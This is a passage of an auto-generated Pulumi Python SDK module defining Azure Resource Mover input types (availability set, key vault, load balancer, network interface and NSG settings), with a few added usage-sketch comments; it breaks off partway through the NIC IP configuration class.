# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AvailabilitySetResourceSettingsArgs',
'DiskEncryptionSetResourceSettingsArgs',
'IdentityArgs',
'KeyVaultResourceSettingsArgs',
'LBBackendAddressPoolResourceSettingsArgs',
'LBFrontendIPConfigurationResourceSettingsArgs',
'LoadBalancerBackendAddressPoolReferenceArgs',
'LoadBalancerNatRuleReferenceArgs',
'LoadBalancerResourceSettingsArgs',
'MoveCollectionPropertiesArgs',
'MoveResourceDependencyOverrideArgs',
'MoveResourcePropertiesArgs',
'NetworkInterfaceResourceSettingsArgs',
'NetworkSecurityGroupResourceSettingsArgs',
'NicIpConfigurationResourceSettingsArgs',
'NsgReferenceArgs',
'NsgSecurityRuleArgs',
'PublicIPAddressResourceSettingsArgs',
'PublicIpReferenceArgs',
'ResourceGroupResourceSettingsArgs',
'SqlDatabaseResourceSettingsArgs',
'SqlElasticPoolResourceSettingsArgs',
'SqlServerResourceSettingsArgs',
'SubnetReferenceArgs',
'SubnetResourceSettingsArgs',
'VirtualMachineResourceSettingsArgs',
'VirtualNetworkResourceSettingsArgs',
]
@pulumi.input_type
class AvailabilitySetResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
fault_domain: Optional[pulumi.Input[int]] = None,
update_domain: Optional[pulumi.Input[int]] = None):
"""
Defines the availability set resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/availabilitySets'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[int] fault_domain: Gets or sets the target fault domain.
:param pulumi.Input[int] update_domain: Gets or sets the target update domain.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/availabilitySets')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if fault_domain is not None:
pulumi.set(__self__, "fault_domain", fault_domain)
if update_domain is not None:
pulumi.set(__self__, "update_domain", update_domain)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/availabilitySets'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the target fault domain.
"""
return pulumi.get(self, "fault_domain")
@fault_domain.setter
def fault_domain(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fault_domain", value)
@property
@pulumi.getter(name="updateDomain")
def update_domain(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the target update domain.
"""
return pulumi.get(self, "update_domain")
@update_domain.setter
def update_domain(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "update_domain", value)
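# Usage sketch (not part of the generated SDK; a hedged example). Only
# ``target_resource_name`` carries through: the constructor always stores the
# literal 'Microsoft.Compute/availabilitySets' as the resource type regardless
# of the ``resource_type`` value passed in. The literal values below are
# hypothetical:
#
#     avset_settings = AvailabilitySetResourceSettingsArgs(
#         resource_type='Microsoft.Compute/availabilitySets',
#         target_resource_name='target-avset',
#         fault_domain=2,    # optional; left unset when omitted
#         update_domain=5,   # optional; left unset when omitted
#     )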
@pulumi.input_type
class DiskEncryptionSetResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the disk encryption set resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/diskEncryptionSets'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/diskEncryptionSets')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/diskEncryptionSets'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class IdentityArgs:
def __init__(__self__, *,
principal_id: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]] = None):
"""
Defines the MSI properties of the Move Collection.
:param pulumi.Input[str] principal_id: Gets or sets the principal id.
:param pulumi.Input[str] tenant_id: Gets or sets the tenant id.
:param pulumi.Input[Union[str, 'ResourceIdentityType']] type: The type of identity used for the resource mover service.
"""
if principal_id is not None:
pulumi.set(__self__, "principal_id", principal_id)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the principal id.
"""
return pulumi.get(self, "principal_id")
@principal_id.setter
def principal_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_id", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the tenant id.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]]:
"""
The type of identity used for the resource mover service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]]):
pulumi.set(self, "type", value)
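# Usage sketch (not part of the generated SDK; a hedged example). All fields of
# ``IdentityArgs`` are optional, and ``type`` accepts either a plain string or
# a ``ResourceIdentityType`` enum member from ``._enums``:
#
#     identity = IdentityArgs(type='SystemAssigned')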
@pulumi.input_type
class KeyVaultResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the key vault resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.KeyVault/vaults'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.KeyVault/vaults')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.KeyVault/vaults'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class LBBackendAddressPoolResourceSettingsArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
Defines load balancer backend address pool properties.
:param pulumi.Input[str] name: Gets or sets the backend address pool name.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the backend address pool name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LBFrontendIPConfigurationResourceSettingsArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_allocation_method: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input['SubnetReferenceArgs']] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines load balancer frontend IP configuration properties.
:param pulumi.Input[str] name: Gets or sets the frontend IP configuration name.
:param pulumi.Input[str] private_ip_address: Gets or sets the IP address of the Load Balancer. This is only specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
:param pulumi.Input[str] private_ip_allocation_method: Gets or sets the private IP allocation method (Static/Dynamic).
:param pulumi.Input['SubnetReferenceArgs'] subnet: Defines reference to subnet.
:param pulumi.Input[str] zones: Gets or sets the comma-separated list of zones.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_allocation_method is not None:
pulumi.set(__self__, "private_ip_allocation_method", private_ip_allocation_method)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the frontend IP configuration name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the IP address of the Load Balancer. This is only specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAllocationMethod")
def private_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the private IP allocation method (Static/Dynamic).
"""
return pulumi.get(self, "private_ip_allocation_method")
@private_ip_allocation_method.setter
def private_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_allocation_method", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input['SubnetReferenceArgs']]:
"""
Defines reference to subnet.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input['SubnetReferenceArgs']]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the comma-separated list of zones.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class LoadBalancerBackendAddressPoolReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to load balancer backend address pools.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LoadBalancerNatRuleReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to load balancer NAT rules.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LoadBalancerResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]] = None,
frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]] = None,
sku: Optional[pulumi.Input[str]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines the load balancer resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/loadBalancers'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]] backend_address_pools: Gets or sets the backend address pools of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]] frontend_ip_configurations: Gets or sets the frontend IP configurations of the load balancer.
:param pulumi.Input[str] sku: Gets or sets load balancer sku (Basic/Standard).
:param pulumi.Input[str] zones: Gets or sets the comma-separated list of zones common to all frontend IP configurations. Note that this is
honored only if frontend IP configuration settings are not present.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/loadBalancers')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if backend_address_pools is not None:
pulumi.set(__self__, "backend_address_pools", backend_address_pools)
if frontend_ip_configurations is not None:
pulumi.set(__self__, "frontend_ip_configurations", frontend_ip_configurations)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/loadBalancers'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="backendAddressPools")
def backend_address_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]]:
"""
Gets or sets the backend address pools of the load balancer.
"""
return pulumi.get(self, "backend_address_pools")
@backend_address_pools.setter
def backend_address_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]]):
pulumi.set(self, "backend_address_pools", value)
@property
@pulumi.getter(name="frontendIPConfigurations")
def frontend_ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]]:
"""
Gets or sets the frontend IP configurations of the load balancer.
"""
return pulumi.get(self, "frontend_ip_configurations")
@frontend_ip_configurations.setter
def frontend_ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]]):
pulumi.set(self, "frontend_ip_configurations", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets load balancer sku (Basic/Standard).
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the comma-separated list of zones common to all frontend IP configurations. Note that this is
honored only if frontend IP configuration settings are not present.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
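# Usage sketch (not part of the generated SDK; a hedged example): a
# Standard-SKU load balancer with one frontend IP configuration bound to a
# subnet reference. All names below are hypothetical placeholders, and the
# SubnetReferenceArgs arguments are elided (see its definition in this module):
#
#     lb_settings = LoadBalancerResourceSettingsArgs(
#         resource_type='Microsoft.Network/loadBalancers',
#         target_resource_name='target-lb',
#         sku='Standard',
#         frontend_ip_configurations=[
#             LBFrontendIPConfigurationResourceSettingsArgs(
#                 name='frontend-1',
#                 private_ip_allocation_method='Dynamic',
#                 subnet=SubnetReferenceArgs(...),
#             ),
#         ],
#     )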
@pulumi.input_type
class MoveCollectionPropertiesArgs:
def __init__(__self__, *,
source_region: pulumi.Input[str],
target_region: pulumi.Input[str]):
"""
Defines the move collection properties.
:param pulumi.Input[str] source_region: Gets or sets the source region.
:param pulumi.Input[str] target_region: Gets or sets the target region.
"""
pulumi.set(__self__, "source_region", source_region)
pulumi.set(__self__, "target_region", target_region)
@property
@pulumi.getter(name="sourceRegion")
def source_region(self) -> pulumi.Input[str]:
"""
Gets or sets the source region.
"""
return pulumi.get(self, "source_region")
@source_region.setter
def source_region(self, value: pulumi.Input[str]):
pulumi.set(self, "source_region", value)
@property
@pulumi.getter(name="targetRegion")
def target_region(self) -> pulumi.Input[str]:
"""
Gets or sets the target region.
"""
return pulumi.get(self, "target_region")
@target_region.setter
def target_region(self, value: pulumi.Input[str]):
pulumi.set(self, "target_region", value)
@pulumi.input_type
class MoveResourceDependencyOverrideArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None):
"""
Defines the dependency override of the move resource.
:param pulumi.Input[str] id: Gets or sets the ARM ID of the dependent resource.
:param pulumi.Input[str] target_id: Gets or sets the ARM ID of either the MoveResource or
the dependent resource.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the ARM ID of the dependent resource.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the ARM ID of either the MoveResource or
the dependent resource.
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@pulumi.input_type
class MoveResourcePropertiesArgs:
def __init__(__self__, *,
source_id: pulumi.Input[str],
depends_on_overrides: Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]] = None,
existing_target_id: Optional[pulumi.Input[str]] = None,
resource_settings: Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]] = None):
"""
Defines the move resource properties.
:param pulumi.Input[str] source_id: Gets or sets the Source ARM Id of the resource.
:param pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]] depends_on_overrides: Gets or sets the move resource dependencies overrides.
:param pulumi.Input[str] existing_target_id: Gets or sets the existing target ARM Id of the resource.
:param pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']] resource_settings: Gets or sets the resource settings.
"""
pulumi.set(__self__, "source_id", source_id)
if depends_on_overrides is not None:
pulumi.set(__self__, "depends_on_overrides", depends_on_overrides)
if existing_target_id is not None:
pulumi.set(__self__, "existing_target_id", existing_target_id)
if resource_settings is not None:
pulumi.set(__self__, "resource_settings", resource_settings)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> pulumi.Input[str]:
"""
Gets or sets the Source ARM Id of the resource.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="dependsOnOverrides")
def depends_on_overrides(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]]:
"""
Gets or sets the move resource dependencies overrides.
"""
return pulumi.get(self, "depends_on_overrides")
@depends_on_overrides.setter
def depends_on_overrides(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]]):
pulumi.set(self, "depends_on_overrides", value)
@property
@pulumi.getter(name="existingTargetId")
def existing_target_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the existing target ARM Id of the resource.
"""
return pulumi.get(self, "existing_target_id")
@existing_target_id.setter
def existing_target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "existing_target_id", value)
@property
@pulumi.getter(name="resourceSettings")
def resource_settings(self) -> Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]]:
"""
Gets or sets the resource settings.
"""
return pulumi.get(self, "resource_settings")
@resource_settings.setter
def resource_settings(self, value: Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]]):
pulumi.set(self, "resource_settings", value)
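# Usage sketch (not part of the generated SDK; a hedged example): move resource
# properties pairing a source ARM ID with availability set target settings.
# The source ID below is a hypothetical placeholder with the subscription and
# resource group segments elided:
#
#     props = MoveResourcePropertiesArgs(
#         source_id='/subscriptions/.../availabilitySets/source-avset',
#         resource_settings=AvailabilitySetResourceSettingsArgs(
#             resource_type='Microsoft.Compute/availabilitySets',
#             target_resource_name='target-avset',
#         ),
#     )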
@pulumi.input_type
class NetworkInterfaceResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]] = None):
"""
Defines the network interface resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkInterfaces'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[bool] enable_accelerated_networking: Gets or sets a value indicating whether accelerated networking is enabled.
:param pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]] ip_configurations: Gets or sets the IP configurations of the NIC.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/networkInterfaces')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkInterfaces'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether accelerated networking is enabled.
"""
return pulumi.get(self, "enable_accelerated_networking")
@enable_accelerated_networking.setter
def enable_accelerated_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_accelerated_networking", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]]:
"""
Gets or sets the IP configurations of the NIC.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]]):
pulumi.set(self, "ip_configurations", value)
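# Illustrative usage (not part of the generated module; names are hypothetical):
# building network interface settings for a resource move.
#
#   nic_settings = NetworkInterfaceResourceSettingsArgs(
#       resource_type='Microsoft.Network/networkInterfaces',
#       target_resource_name='target-nic',
#       enable_accelerated_networking=True,
#       ip_configurations=[NicIpConfigurationResourceSettingsArgs(
#           name='ipconfig1',
#           primary=True,
#           private_ip_allocation_method='Dynamic',
#       )])
#
# Note that the constructor pins resource_type to
# 'Microsoft.Network/networkInterfaces' regardless of the value passed in,
# since resource_type is the discriminator for the ResourceSettings union.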


@pulumi.input_type
class NetworkSecurityGroupResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]] = None):
"""
Defines the NSG resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkSecurityGroups'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]] security_rules: Gets or sets the security rules of the network security group.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/networkSecurityGroups')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkSecurityGroups'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]]:
"""
Gets or sets the security rules of the network security group.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NsgSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)


@pulumi.input_type
class NicIpConfigurationResourceSettingsArgs:
def __init__(__self__, *,
load_balancer_backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]] = None,
load_balancer_nat_rules: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
